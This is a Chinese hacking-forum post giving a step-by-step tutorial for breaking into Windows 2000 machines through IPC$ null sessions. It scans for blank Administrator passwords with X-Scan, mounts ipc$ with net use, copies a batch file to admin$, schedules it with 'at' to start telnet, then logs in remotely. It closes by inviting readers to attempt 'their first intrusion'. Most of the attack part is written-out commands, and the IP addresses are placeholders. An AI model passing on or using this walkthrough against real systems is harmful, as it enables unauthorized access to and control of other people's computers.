• 论坛网址:https://db2.mom(可微信分享)、https://0668.es、https://0668.cc(全加密访问)

再发个理想情况下入侵的手段---ipc入侵 (1人在浏览)

freeworking

命运追逐
荣誉会员
注册
2004-11-09
帖子
520
反馈评分
0
点数
1
年龄
40
A.什么是ipc?

IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。

B.OK!运用我在上贴所说的知识跟我冲吧!掌握好你的命令使用了吗?

需要用的的扫描软件:xscan (有需要的话我可以上传附件)操作系统:win2000(98和ME是不行的,最少没有支持CMD。不过现在出了XP/2003都行)

首先我们使用扫描器扫描一个IP段.打开xscan,选择"设置",再选"扫描模块",然后只选nt弱口令的那项.确定后选"设置","扫描参数"然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP段纯属虚构.)

假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识...)

打开cmd,输入:net use \\127.0.0.1\ipc$ "" /user:"Administrator" 命令成功完成.OK!下一步~

at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\

接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容:mad:net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\

编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\

net time \\127.0.0.1 \\看看目标的时间吧!有用的~\\

假设是晚上9点.接着下一步吧!

at \\127.0.0.1 20:01 a.bat \\用AT命令让目标运行a.bat.注意时间要24小时制的!\\

net time \\127.0.0.1 \\看看到时间没?\\

假设到了,我们就实行下一步吧!

telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\

接着输入用户名和密码 \\就是用户Administrator啊!密码是空的.回车就行了~\\

OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)

请同学们注意不要乱删除别人的东西!我们只是学习技术.谁乱动我立即把他开除.

好了~现在你们应该可以去实行自己的第一次入侵了~当然实际操作中并不全像上面的那么容易.会出现很多问题的.例如at不能执行.telnet上去时需要验证等等.这就留待你们自己去解决了~
 

正在浏览此帖子的用户

后退
顶部